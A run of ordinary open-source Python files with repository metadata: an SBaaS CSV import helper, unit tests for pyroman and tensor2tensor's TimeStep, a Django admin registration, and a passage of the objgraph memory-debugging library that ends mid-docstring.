"alnum_prop": 0.6609849568151919,
"repo_name": "MeteorKepler/RICGA",
"id": "d3f422f754d71886d52977f571eba39997a21645",
"size": "18172",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ricga/data/build_mscoco_data.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "942566"
},
{
"name": "Python",
"bytes": "188498"
},
{
"name": "Shell",
"bytes": "3042"
}
],
"symlink_target": ""
} |
import json
from .visualization_user_query import visualization_user_query
from SBaaS_base.sbaas_template_io import sbaas_template_io
# Resources
from io_utilities.base_importData import base_importData
from io_utilities.base_exportData import base_exportData
from ddt_python.ddt_container import ddt_container
class visualization_user_io(visualization_user_query, sbaas_template_io):
    """CSV import helpers for the visualizationUser table."""

    def import_visualizationUser_add(self, filename):
        '''table adds'''
        self._import_visualizationUser_csv(filename, self.add_visualizationUser)

    def import_visualizationUser_update(self, filename):
        # BUGFIX: docstring previously said "table adds" (copy-paste).
        '''table updates'''
        self._import_visualizationUser_csv(filename, self.update_visualizationUser)

    def _import_visualizationUser_csv(self, filename, apply_rows):
        '''Read a CSV file, format it, hand the rows to apply_rows, then clear.

        Shared by the add/update entry points above to avoid duplicating the
        import pipeline.
        '''
        data = base_importData()
        data.read_csv(filename)
        data.format_data()
        apply_rows(data.data)
        data.clear_data()
| {
"content_hash": "39d244bd590a44031ad50c10787f31c9",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 72,
"avg_line_length": 35.56,
"alnum_prop": 0.6996625421822272,
"repo_name": "dmccloskey/SBaaS_visualization",
"id": "c3f6afe75097403ac5d6fd168e30b96ff83c0e9f",
"size": "898",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SBaaS_visualization/visualization_user_io.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "78694"
}
],
"symlink_target": ""
} |
from pyroman.document import Document
from pyroman.page import Page, Layout
from pyroman.box import Box
from pyroman.paragraph import Paragraph
from pyroman.construct import Construct
import pyroman.json as json
from pyroman.pdf.dimension import A4, MarginDefault
from tests.fixture import a4doc
from pyroman.parameters import defaults
#from pyroman.pdf.dimension import A4
class TestDocument:
    """ Test that the basic hierarchy is working """
    def test_hierarchy(self):
        page_width, page_height = A4
        document = Document({
            'width': page_width,
            'height': page_height
        })
        assert document.width == page_width
        assert document.height == page_height
        document.margin = MarginDefault
        assert document.margin_top == MarginDefault[0]
        assert document.margin_right == MarginDefault[1]
        assert document.margin_bottom == MarginDefault[2]
        assert document.margin_left == MarginDefault[3]
        page = Page(document)
        layout = Layout()
        layout.define_area(
            'main',
            (page.margin_left, page.margin_top),
            (page.width - page.margin_right, page.height - page.margin_bottom))
        page.layout = layout
        document.append(page)
        assert page.width == page_width
        # BUGFIX: was `assert page_height == page_height`, a tautology that
        # could never fail; compare the page's actual height instead.
        assert page.height == page_height
        box = Box(document, page, {
            'box-class': 'main',
        })
        page.append(box)
        assert box.y == MarginDefault[0]  # top
        assert box.x == MarginDefault[3]  # left
        assert box.width == page_width - MarginDefault[1] - MarginDefault[3]
        assert box.height == page_height - MarginDefault[0] - MarginDefault[2]

    """ Test that a Construct acts as a paragraph """
    def test_construct(self):
        document, page, box = a4doc()
        construct = Construct(document, box)
        construct.height = 200
        box.append(construct)
        p1 = Paragraph(document, construct, defaults.get('text'))
        p1.content = "some text in a paragraph in a construct"
        construct.append(p1)
        box.calculate()
        print(json.dumph(document))
        # must actually test stuff here
| {
"content_hash": "286e1c928404dbc40481bf81120cc0d4",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 79,
"avg_line_length": 31.65714285714286,
"alnum_prop": 0.6331227436823105,
"repo_name": "eblade/pyroman2",
"id": "fcd33da800edad60568694962958a5f82d07469e",
"size": "2216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_document.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "100465"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from snippets.models import Snippet
@admin.register(Snippet)
class SnippetAdmin(admin.ModelAdmin):
    """Default admin configuration for the Snippet model."""
"content_hash": "71cacc87baa7fa47161121bd39be166e",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 42,
"avg_line_length": 20.125,
"alnum_prop": 0.8136645962732919,
"repo_name": "rishatsharafiev/crm",
"id": "6138c2e8a9e99b4482b676fb8f493355d2642f0c",
"size": "186",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project/snippets/admin.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""Tests for tensor2tensor.envs.time_step."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.envs import time_step
import tensorflow.compat.v1 as tf
class TimeStepTest(tf.test.TestCase):
    """Unit tests for time_step.TimeStep creation and replacement."""

    def test_create_time_step(self):
        # Build a fully-populated TimeStep and check every field round-trips.
        ts = time_step.TimeStep.create_time_step(
            observation=1, done=True, raw_reward=1.0, processed_reward=1, action=1,
            info={1: 1, 2: 4})
        self.assertEqual(1, ts.observation)
        self.assertTrue(ts.done)
        self.assertNear(1.0, ts.raw_reward, 1e-6)
        self.assertEqual(1, ts.processed_reward)
        self.assertEqual(1, ts.action)
        self.assertEqual({1: 1, 2: 4}, ts.info)

    def test_replace(self):
        # replace() must return a modified copy, leaving the original intact.
        ts = time_step.TimeStep.create_time_step(observation=1, action=1)
        self.assertFalse(ts.done)
        tsr = ts.replace(action=2, done=True, info={1: 1, 2: 4})
        # Assert that ts didn't change.
        self.assertFalse(ts.done)
        self.assertEqual(1, ts.observation)
        self.assertEqual(1, ts.action)
        # But tsr is as expected.
        self.assertTrue(tsr.done)
        self.assertEqual(1, tsr.observation)  # unchanged
        self.assertEqual(2, tsr.action)  # changed
        self.assertEqual({1: 1, 2: 4}, tsr.info)


if __name__ == '__main__':
    tf.test.main()
| {
"content_hash": "912f460accde9e7e467a3ec762c63e89",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 79,
"avg_line_length": 28.555555555555557,
"alnum_prop": 0.6747081712062257,
"repo_name": "tensorflow/tensor2tensor",
"id": "98476bb219027439d65cc77414ad6b3e89b65abf",
"size": "1891",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensor2tensor/envs/time_step_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "32015"
},
{
"name": "HTML",
"bytes": "34684"
},
{
"name": "JavaScript",
"bytes": "78408"
},
{
"name": "Jupyter Notebook",
"bytes": "2859453"
},
{
"name": "Python",
"bytes": "5109255"
},
{
"name": "Shell",
"bytes": "11941"
}
],
"symlink_target": ""
} |
"""
Tools for drawing Python object reference graphs with graphviz.
You can find documentation online at https://mg.pov.lt/objgraph/
Copyright (c) 2008-2017 Marius Gedminas <marius@pov.lt> and contributors
Released under the MIT licence.
"""
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import print_function
import codecs
import collections
import gc
import inspect
import itertools
import operator
import os
import re
import subprocess
import sys
import tempfile
import types
# Python 2/3 compatibility shims.  Each try/except probes for the Python 2
# spelling and falls back to the Python 3 equivalent.
try:
    # Python 2.x compatibility
    from StringIO import StringIO
except ImportError:  # pragma: PY3
    from io import StringIO
try:
    # Python 2 old-style instances; used by _get_obj_type().
    from types import InstanceType
except ImportError:  # pragma: PY3
    # Python 3.x compatibility: no old-style classes, sentinel never matches.
    InstanceType = None
__author__ = "Marius Gedminas (marius@gedmin.as)"
__copyright__ = "Copyright (c) 2008-2017 Marius Gedminas and contributors"
__license__ = "MIT"
__version__ = '3.5.1.dev0'
__date__ = '2020-10-11'
try:
    basestring
except NameError:  # pragma: PY3
    # Python 3.x compatibility
    basestring = str
try:
    iteritems = dict.iteritems
except AttributeError:  # pragma: PY3
    # Python 3.x compatibility
    iteritems = dict.items
# True when we should render graphs inline (IPython notebook-style shells).
IS_INTERACTIVE = False
try:  # pragma: nocover
    import graphviz
    # get_ipython() is only defined when running inside IPython; outside
    # of it the NameError is caught below.
    if 'TerminalInteractiveShell' not in get_ipython().__class__.__name__:
        # So far I know two shells where it's inappropriate to use inline
        # graphics, because they're text only:
        # - ipython uses a TerminalInteractiveShell
        # - pycharm's console uses PyDevTerminalInteractiveShell
        IS_INTERACTIVE = True
except (NameError, ImportError):
    pass
def _isinstance(object, classinfo):
"""Return whether an object is an instance of a class or its subclass.
Differs from the builtin isinstance() implementation in that it does not
depend on the ``__class__`` attribute which is proxied by
mock.Mock(spec=...).
"""
return issubclass(type(object), classinfo)
def count(typename, objects=None):
    """Count objects tracked by the garbage collector with a given class name.

    The class name can optionally be fully qualified
    ('package.module.ClassName') as well as a short name ('ClassName').

    Example:

        >>> count('dict')
        42
        >>> count('mymodule.MyClass')
        2

    .. note::

        The Python garbage collector does not track simple objects like
        int or str.  See
        https://docs.python.org/3/library/gc.html#gc.is_tracked

    Instead of looking through all objects tracked by the GC, you may
    specify your own collection, e.g.
    ``count('MyClass', get_leaking_objects())``.

    See also: :func:`get_leaking_objects`.

    .. versionchanged:: 1.7
       New parameter: ``objects``.

    .. versionchanged:: 1.8
       Accepts fully-qualified type names as well as short type names.
    """
    if objects is None:
        objects = gc.get_objects()
    try:
        # A dotted name means the caller wants module-qualified matching.
        name_of = _long_typename if '.' in typename else _short_typename
        return sum(1 for candidate in objects if name_of(candidate) == typename)
    finally:
        # Drop our reference so this frame doesn't keep the objects alive.
        del objects
def typestats(objects=None, shortnames=True, filter=None):
    """Count the number of instances for each type tracked by the GC.

    Note that the GC does not track simple objects like int or str.

    Note that classes with the same name but defined in different modules
    will be lumped together if ``shortnames`` is True.

    If ``filter`` is specified, it should be a function taking one argument
    and returning a boolean.  Objects for which ``filter(obj)`` returns
    ``False`` will be ignored.

    Example:

        >>> typestats()
        {'list': 12041, 'tuple': 10245, ...}

    .. versionadded:: 1.1

    .. versionchanged:: 1.7
       New parameter: ``objects``.

    .. versionchanged:: 1.8
       New parameter: ``shortnames``.

    .. versionchanged:: 3.1.3
       New parameter: ``filter``.
    """
    if objects is None:
        objects = gc.get_objects()
    try:
        name_of = _short_typename if shortnames else _long_typename
        stats = {}
        for candidate in objects:
            if filter and not filter(candidate):
                continue
            key = name_of(candidate)
            stats[key] = stats.get(key, 0) + 1
        return stats
    finally:
        # Drop our reference so this frame doesn't keep the objects alive.
        del objects
def most_common_types(limit=10, objects=None, shortnames=True, filter=None):
    """Count the names of types with the most instances.

    Returns a list of (type_name, count), sorted most-frequent-first.

    Limits the return value to at most ``limit`` items.  You may set
    ``limit`` to None to avoid that.

    If ``filter`` is specified, it should be a function taking one argument
    and returning a boolean.  Objects for which ``filter(obj)`` returns
    ``False`` will be ignored.

    The caveats documented in :func:`typestats` apply.

    Example:

        >>> most_common_types(limit=2)
        [('list', 12041), ('tuple', 10245)]

    .. versionadded:: 1.4

    .. versionchanged:: 1.7
       New parameter: ``objects``.

    .. versionchanged:: 1.8
       New parameter: ``shortnames``.

    .. versionchanged:: 3.1.3
       New parameter: ``filter``.
    """
    counts = typestats(objects, shortnames=shortnames, filter=filter)
    ranked = sorted(counts.items(), key=operator.itemgetter(1), reverse=True)
    return ranked[:limit] if limit else ranked
def show_most_common_types(
        limit=10,
        objects=None,
        shortnames=True,
        file=None,
        filter=None):
    """Print the table of types of most common instances.

    If ``filter`` is specified, it should be a function taking one argument
    and returning a boolean.  Objects for which ``filter(obj)`` returns
    ``False`` will be ignored.

    The caveats documented in :func:`typestats` apply.

    Example:

        >>> show_most_common_types(limit=5)
        tuple 8959
        function 2442
        wrapper_descriptor 1048
        dict 953
        builtin_function_or_method 800

    .. versionadded:: 1.1

    .. versionchanged:: 1.7
       New parameter: ``objects``.

    .. versionchanged:: 1.8
       New parameter: ``shortnames``.

    .. versionchanged:: 3.0
       New parameter: ``file``.

    .. versionchanged:: 3.1.3
       New parameter: ``filter``.
    """
    if file is None:
        file = sys.stdout
    stats = most_common_types(limit, objects, shortnames=shortnames,
                              filter=filter)
    if not stats:
        # Nothing matched (e.g. an empty ``objects`` list or an
        # all-rejecting ``filter``); previously max() raised ValueError
        # on the empty sequence.  show_growth() already guards like this.
        return
    width = max(len(name) for name, count in stats)
    for name, count in stats:
        file.write('%-*s %i\n' % (width, name, count))
def growth(limit=10, peak_stats={}, shortnames=True, filter=None):
    """Count the increase in peak object since last call.

    Returns a list of (type_name, total_count, increase_delta),
    descending order by increase_delta.

    Limits the output to ``limit`` largest deltas.  You may set ``limit``
    to None to see all of them.

    Uses and updates ``peak_stats``, a dictionary from type names to
    previously seen peak object counts.  Usually you don't need to pay
    attention to this argument.  (The mutable default is deliberate: it is
    the shared memory between successive calls.)

    If ``filter`` is specified, it should be a function taking one argument
    and returning a boolean.  Objects for which ``filter(obj)`` returns
    ``False`` will be ignored.

    The caveats documented in :func:`typestats` apply.

    Example:

        >>> growth(2)
        [(tuple, 12282, 10), (dict, 1922, 7)]

    .. versionadded:: 3.3.0
    """
    gc.collect()
    stats = typestats(shortnames=shortnames, filter=filter)
    deltas = {}
    for name, current in iteritems(stats):
        previous_peak = peak_stats.get(name, 0)
        if current > previous_peak:
            deltas[name] = current - previous_peak
            peak_stats[name] = current
    ordered = sorted(deltas.items(), key=operator.itemgetter(1), reverse=True)
    if limit:
        ordered = ordered[:limit]
    return [(name, stats[name], delta) for name, delta in ordered]
def show_growth(limit=10, peak_stats=None, shortnames=True, file=None,
                filter=None):
    """Show the increase in peak object counts since last call.

    If ``peak_stats`` is None, the peak object counts are recorded in
    :func:`growth`'s shared default dictionary; pass your own dictionary
    as ``peak_stats`` if you want to keep the counts yourself.

    The caveats documented in :func:`growth` apply.

    Example:

        >>> show_growth()
        wrapper_descriptor 970 +14
        tuple 12282 +10
        dict 1922 +7
        ...

    .. versionadded:: 1.5

    .. versionchanged:: 1.8
       New parameter: ``shortnames``.

    .. versionchanged:: 2.1
       New parameter: ``file``.

    .. versionchanged:: 3.1.3
       New parameter: ``filter``.
    """
    if peak_stats is None:
        result = growth(limit, shortnames=shortnames, filter=filter)
    else:
        result = growth(limit, peak_stats, shortnames, filter)
    if not result:
        return
    if file is None:
        file = sys.stdout
    width = max(len(name) for name, _, _ in result)
    for name, total, delta in result:
        file.write('%-*s%9d %+9d\n' % (width, name, total, delta))
def get_new_ids(skip_update=False, limit=10, sortby='deltas',
                shortnames=None, file=None, _state={}):
    """Find and display new objects allocated since last call.

    Shows the increase in object counts since last call to this
    function and returns the memory address ids for new objects.

    Returns a dictionary mapping object type names to sets of object IDs
    that have been created since the last time this function was called.

    ``skip_update`` (bool): If True, returns the same dictionary that
    was returned during the previous call without updating the internal
    state or examining the objects currently in memory.

    ``limit`` (int): The maximum number of rows that you want to print
    data for.  Use 0 to suppress the printing.  Use None to print everything.

    ``sortby`` (str): This is the column that you want to sort by in
    descending order.  Possible values are: 'old', 'current', 'new',
    'deltas'

    ``shortnames`` (bool): If True, classes with the same name but
    defined in different modules will be lumped together.  If False,
    all type names will be qualified with the module name.  If None (default),
    ``get_new_ids`` will remember the value from previous calls, so it's
    enough to prime this once.  By default the primed value is True.

    ``_state`` (dict): Stores old, current, and new_ids in memory.
    It is used by the function to store the internal state between calls.
    Never pass in this argument unless you know what you're doing.

    The caveats documented in :func:`growth` apply.

    When one gets new_ids from :func:`get_new_ids`, one can use
    :func:`at_addrs` to get a list of those objects.  Then one can iterate over
    the new objects, print out what they are, and call :func:`show_backrefs` or
    :func:`show_chain` to see where they are referenced.

    Example:

        >>> _ = get_new_ids() # store current objects in _state
        >>> _ = get_new_ids() # current_ids become old_ids in _state
        >>> a = [0, 1, 2] # list we don't know about
        >>> b = [3, 4, 5] # list we don't know about
        >>> new_ids = get_new_ids(limit=3) # we see new lists
        ======================================================================
        Type Old_ids Current_ids New_ids Count_Deltas
        ======================================================================
        list 324 326 +3 +2
        dict 1125 1125 +0 +0
        wrapper_descriptor 1001 1001 +0 +0
        ======================================================================
        >>> new_lists = at_addrs(new_ids['list'])
        >>> a in new_lists
        True
        >>> b in new_lists
        True

    .. versionadded:: 3.4
    """
    if not _state:
        # First call: initialize the persistent state kept in the mutable
        # default argument (intentional -- it survives between calls).
        _state['old'] = collections.defaultdict(set)
        _state['current'] = collections.defaultdict(set)
        _state['new'] = collections.defaultdict(set)
        _state['shortnames'] = True
    new_ids = _state['new']
    if skip_update:
        return new_ids
    old_ids = _state['old']
    current_ids = _state['current']
    if shortnames is None:
        # Reuse the value primed on a previous call.
        shortnames = _state['shortnames']
    else:
        _state['shortnames'] = shortnames
    gc.collect()
    objects = gc.get_objects()
    # Rotate state: what was "current" on the previous call becomes "old".
    for class_name in old_ids:
        old_ids[class_name].clear()
    for class_name, ids_set in current_ids.items():
        old_ids[class_name].update(ids_set)
    for class_name in current_ids:
        current_ids[class_name].clear()
    # Take a fresh snapshot of all GC-tracked object ids, keyed by type name.
    for o in objects:
        if shortnames:
            class_name = _short_typename(o)
        else:
            class_name = _long_typename(o)
        id_number = id(o)
        current_ids[class_name].add(id_number)
    for class_name in new_ids:
        new_ids[class_name].clear()
    rows = []
    keys_to_remove = []
    for class_name in current_ids:
        num_old = len(old_ids[class_name])
        num_current = len(current_ids[class_name])
        if num_old == 0 and num_current == 0:
            # remove the key from our dicts if we don't have any old or
            # current class_name objects
            keys_to_remove.append(class_name)
            continue
        # New ids are those present now but absent from the previous snapshot.
        new_ids_set = current_ids[class_name] - old_ids[class_name]
        new_ids[class_name].update(new_ids_set)
        num_new = len(new_ids_set)
        num_delta = num_current - num_old
        row = (class_name, num_old, num_current, num_new, num_delta)
        rows.append(row)
    for key in keys_to_remove:
        del old_ids[key]
        del current_ids[key]
        del new_ids[key]
    index_by_sortby = {'old': 1, 'current': 2, 'new': 3, 'deltas': 4}
    rows.sort(key=operator.itemgetter(index_by_sortby[sortby], 0),
              reverse=True)
    if limit is not None:
        rows = rows[:limit]
    if not rows:
        return new_ids
    if file is None:
        file = sys.stdout
    width = max(len(row[0]) for row in rows)
    print('='*(width+13*4), file=file)
    print('%-*s%13s%13s%13s%13s' %
          (width, 'Type', 'Old_ids', 'Current_ids', 'New_ids', 'Count_Deltas'),
          file=file)
    print('='*(width+13*4), file=file)
    for row_class, old, current, new, delta in rows:
        print('%-*s%13d%13d%+13d%+13d' %
              (width, row_class, old, current, new, delta), file=file)
    print('='*(width+13*4), file=file)
    return new_ids
def get_leaking_objects(objects=None):
    """Return objects that do not have any referents.

    These could indicate reference-counting bugs in C code.  Or they could
    be legitimate.

    Note that the GC does not track simple objects like int or str.

    .. versionadded:: 1.7
    """
    if objects is None:
        gc.collect()
        objects = gc.get_objects()
    # Pre-bind the loop variable so the final ``del`` cannot raise
    # NameError when ``objects`` is empty (the original ``del objects, i``
    # crashed in that case because the loop never bound ``i``).
    obj = None
    try:
        ids = set(id(i) for i in objects)
        for obj in objects:
            ids.difference_update(id(j) for j in gc.get_referents(obj))
        # this then is our set of objects without referrers
        return [i for i in objects if id(i) in ids]
    finally:
        del objects, obj  # clear cyclic references to frame
def by_type(typename, objects=None):
    """Return objects tracked by the garbage collector with a given class name.

    Example:

        >>> by_type('MyClass')
        [<mymodule.MyClass object at 0x...>]

    Note that the GC does not track simple objects like int or str.

    .. versionchanged:: 1.7
       New parameter: ``objects``.

    .. versionchanged:: 1.8
       Accepts fully-qualified type names as well as short type names.
    """
    if objects is None:
        objects = gc.get_objects()
    try:
        # A dotted name means the caller wants module-qualified matching.
        name_of = _long_typename if '.' in typename else _short_typename
        return [candidate for candidate in objects
                if name_of(candidate) == typename]
    finally:
        # Drop our reference so this frame doesn't keep the objects alive.
        del objects
def at(addr):
    """Return an object at a given memory address.

    The reverse of id(obj):

        >>> at(id(obj)) is obj
        True

    Note that this function does not work on objects that are not tracked
    by the GC (e.g. ints or strings).
    """
    for candidate in gc.get_objects():
        if id(candidate) == addr:
            return candidate
    return None
def at_addrs(address_set):
    """Return a list of objects for a given set of memory addresses.

    The reverse of [id(obj1), id(obj2), ...].  Note that objects are
    returned in an arbitrary order.

    When one gets ``new_ids`` from :func:`get_new_ids`, one can use this
    function to get a list of those objects.  Then one can iterate over the
    new objects, print out what they are, and call :func:`show_backrefs` or
    :func:`show_chain` to see where they are referenced.

        >>> a = [0, 1, 2]
        >>> new_ids = get_new_ids()
        >>> new_lists = at_addrs(new_ids['list'])
        >>> a in new_lists
        True

    Note that this function does not work on objects that are not tracked
    by the GC (e.g. ints or strings).

    .. versionadded:: 3.4
    """
    return [candidate for candidate in gc.get_objects()
            if id(candidate) in address_set]
def find_ref_chain(obj, predicate, max_depth=20, extra_ignore=()):
    """Find a shortest chain of references leading from obj.

    The end of the chain will be some object that matches your predicate.

    ``predicate`` is a function taking one argument and returning a boolean.

    ``max_depth`` limits the search depth.

    ``extra_ignore`` can be a list of object IDs to exclude those objects
    from your search.

    Example:

        >>> find_ref_chain(obj, lambda x: isinstance(x, MyClass))
        [obj, ..., <MyClass object at ...>]

    Returns ``[obj]`` if such a chain could not be found.

    .. versionadded:: 1.7
    """
    # _find_chain() returns the chain match-first; reverse it so the
    # result starts at ``obj``.
    chain = _find_chain(obj, predicate, gc.get_referents,
                        max_depth=max_depth, extra_ignore=extra_ignore)
    return chain[::-1]
def find_backref_chain(obj, predicate, max_depth=20, extra_ignore=()):
    """Find a shortest chain of references leading to obj.

    The start of the chain will be some object that matches your predicate.

    ``predicate`` is a function taking one argument and returning a boolean.

    ``max_depth`` limits the search depth.

    ``extra_ignore`` can be a list of object IDs to exclude those objects
    from your search.

    Example:

        >>> find_backref_chain(obj, is_proper_module)
        [<module ...>, ..., obj]

    Returns ``[obj]`` if such a chain could not be found.

    .. versionchanged:: 1.5
       Returns ``obj`` instead of ``None`` when a chain could not be found.
    """
    # _find_chain() already returns the chain in match-first order, which
    # for backrefs is exactly what callers expect.
    chain = _find_chain(obj, predicate, gc.get_referrers,
                        max_depth=max_depth, extra_ignore=extra_ignore)
    return chain
def show_backrefs(objs, max_depth=3, extra_ignore=(), filter=None, too_many=10,
                  highlight=None, filename=None, extra_info=None,
                  refcounts=False, shortnames=True, output=None,
                  extra_node_attrs=None):
    """Generate an object reference graph ending at ``objs``.

    The graph will show you what objects refer to ``objs``, directly and
    indirectly.

    ``objs`` can be a single object, or it can be a list of objects.  If
    unsure, wrap the single object in a new list.

    ``filename`` if specified, can be the name of a .dot or an image
    file, whose extension indicates the desired output format; note
    that output to a specific format is entirely handled by GraphViz:
    if the desired format is not supported, you just get the .dot
    file.  If ``filename`` and ``output`` are not specified, ``show_backrefs``
    will try to display the graph inline (if you're using IPython), otherwise
    it'll try to produce a .dot file and spawn a viewer (xdot).  If xdot is
    not available, ``show_backrefs`` will convert the .dot file to a
    .png and print its name.

    ``output`` if specified, the GraphViz output will be written to this
    file object.  ``output`` and ``filename`` should not both be specified.

    Use ``max_depth`` and ``too_many`` to limit the depth and breadth of
    the graph.

    Use ``filter`` (a predicate) and ``extra_ignore`` (a list of object IDs)
    to remove undesired objects from the graph.

    Use ``highlight`` (a predicate) to highlight certain graph nodes in blue.

    Use ``extra_info`` (a function taking one argument and returning a
    string) to report extra information for objects.

    Use ``extra_node_attrs`` (a function taking the current object as
    argument, returning a dict of strings) to add extra attributes to the
    nodes.  See https://www.graphviz.org/doc/info/attrs.html for a list of
    possible node attributes.

    Specify ``refcounts=True`` if you want to see reference counts.
    These will mostly match the number of arrows pointing to an object,
    but can be different for various reasons.

    Specify ``shortnames=False`` if you want to see fully-qualified type
    names ('package.module.ClassName').  By default you get to see only the
    class name part.

    Examples:

        >>> show_backrefs(obj)
        >>> show_backrefs([obj1, obj2])
        >>> show_backrefs(obj, max_depth=5)
        >>> show_backrefs(obj, filter=lambda x: not inspect.isclass(x))
        >>> show_backrefs(obj, highlight=inspect.isclass)
        >>> show_backrefs(obj, extra_ignore=[id(locals())])
        >>> show_backrefs(obj, extra_node_attrs=lambda x: dict(URL=str(id(x))))

    .. versionchanged:: 1.3
       New parameters: ``filename``, ``extra_info``.

    .. versionchanged:: 1.5
       New parameter: ``refcounts``.

    .. versionchanged:: 1.8
       New parameter: ``shortnames``.

    .. versionchanged:: 2.0
       New parameter: ``output``.

    .. versionchanged:: 3.5
       New parameter: ``extra_node_attrs``.
    """
    # For show_backrefs(), it makes sense to stop when reaching a
    # module because you'll end up in sys.modules and explode the
    # graph with useless clutter.  That's why we're specifying
    # cull_func here, but not in show_graph().
    return _show_graph(objs, max_depth=max_depth, extra_ignore=extra_ignore,
                       filter=filter, too_many=too_many, highlight=highlight,
                       edge_func=gc.get_referrers, swap_source_target=False,
                       filename=filename, output=output, extra_info=extra_info,
                       refcounts=refcounts, shortnames=shortnames,
                       cull_func=is_proper_module,
                       extra_node_attrs=extra_node_attrs)
def show_refs(objs, max_depth=3, extra_ignore=(), filter=None, too_many=10,
              highlight=None, filename=None, extra_info=None,
              refcounts=False, shortnames=True, output=None,
              extra_node_attrs=None):
    """Generate an object reference graph starting at ``objs``.

    The graph will show you what objects are reachable from ``objs``,
    directly and indirectly.

    ``objs`` can be a single object, or it can be a list of objects.  If
    unsure, wrap the single object in a new list.

    ``filename`` if specified, can be the name of a .dot or an image
    file, whose extension indicates the desired output format; note
    that output to a specific format is entirely handled by GraphViz:
    if the desired format is not supported, you just get the .dot
    file.  If ``filename`` and ``output`` are not specified, ``show_refs``
    will try to display the graph inline (if you're using IPython), otherwise
    it'll try to produce a .dot file and spawn a viewer (xdot).  If xdot is
    not available, ``show_refs`` will convert the .dot file to a
    .png and print its name.

    ``output`` if specified, the GraphViz output will be written to this
    file object.  ``output`` and ``filename`` should not both be specified.

    Use ``max_depth`` and ``too_many`` to limit the depth and breadth of
    the graph.

    Use ``filter`` (a predicate) and ``extra_ignore`` (a list of object IDs)
    to remove undesired objects from the graph.

    Use ``highlight`` (a predicate) to highlight certain graph nodes in blue.

    Use ``extra_info`` (a function returning a string) to report extra
    information for objects.

    Use ``extra_node_attrs`` (a function taking the current object as
    argument, returning a dict of strings) to add extra attributes to the
    nodes.  See https://www.graphviz.org/doc/info/attrs.html for a list of
    possible node attributes.

    Specify ``refcounts=True`` if you want to see reference counts.

    Examples:

        >>> show_refs(obj)
        >>> show_refs([obj1, obj2])
        >>> show_refs(obj, max_depth=5)
        >>> show_refs(obj, filter=lambda x: not inspect.isclass(x))
        >>> show_refs(obj, highlight=inspect.isclass)
        >>> show_refs(obj, extra_ignore=[id(locals())])
        >>> show_refs(obj, extra_node_attrs=lambda x: dict(URL=str(id(x))))

    .. versionadded:: 1.1

    .. versionchanged:: 1.3
       New parameters: ``filename``, ``extra_info``.

    .. versionchanged:: 1.5
       Follows references from module objects instead of stopping.
       New parameter: ``refcounts``.

    .. versionchanged:: 1.8
       New parameter: ``shortnames``.

    .. versionchanged:: 2.0
       New parameter: ``output``.

    .. versionchanged:: 3.5
       New parameter: ``extra_node_attrs``.
    """
    return _show_graph(objs, max_depth=max_depth, extra_ignore=extra_ignore,
                       filter=filter, too_many=too_many, highlight=highlight,
                       edge_func=gc.get_referents, swap_source_target=True,
                       filename=filename, extra_info=extra_info,
                       refcounts=refcounts, shortnames=shortnames,
                       output=output, extra_node_attrs=extra_node_attrs)
def show_chain(*chains, **kw):
    """Show a chain (or several chains) of object references.

    Useful in combination with :func:`find_ref_chain` or
    :func:`find_backref_chain`, e.g.

        >>> show_chain(find_backref_chain(obj, is_proper_module))

    You can specify if you want that chain traced backwards or forwards
    by passing a ``backrefs`` keyword argument, e.g.

        >>> show_chain(find_ref_chain(obj, is_proper_module),
        ...            backrefs=False)

    Ideally this shouldn't matter, but for some objects
    :func:`gc.get_referrers` and :func:`gc.get_referents` are not perfectly
    symmetrical.

    You can specify ``highlight``, ``extra_info``, ``refcounts``,
    ``shortnames``, ``filename`` or ``output`` arguments like for
    :func:`show_backrefs` or :func:`show_refs`.

    .. versionadded:: 1.5

    .. versionchanged:: 1.7
       New parameter: ``backrefs``.

    .. versionchanged:: 2.0
       New parameter: ``output``.
    """
    backrefs = kw.pop('backrefs', True)
    chains = [chain for chain in chains if chain]  # remove empty ones
    if not chains:
        # Nothing to show.  Previously this fell through to max() over an
        # empty sequence and raised ValueError.
        return

    def in_chains(x, ids=set(map(id, itertools.chain(*chains)))):
        return id(x) in ids

    max_depth = max(map(len, chains)) - 1
    if backrefs:
        show_backrefs([chain[-1] for chain in chains], max_depth=max_depth,
                      filter=in_chains, **kw)
    else:
        show_refs([chain[0] for chain in chains], max_depth=max_depth,
                  filter=in_chains, **kw)
def is_proper_module(obj):
    """
    Returns ``True`` if ``obj`` can be treated like a garbage collector root.

    That is, if ``obj`` is a module that is in ``sys.modules``.

    >>> import types
    >>> is_proper_module([])
    False
    >>> is_proper_module(types)
    True
    >>> is_proper_module(types.ModuleType('foo'))
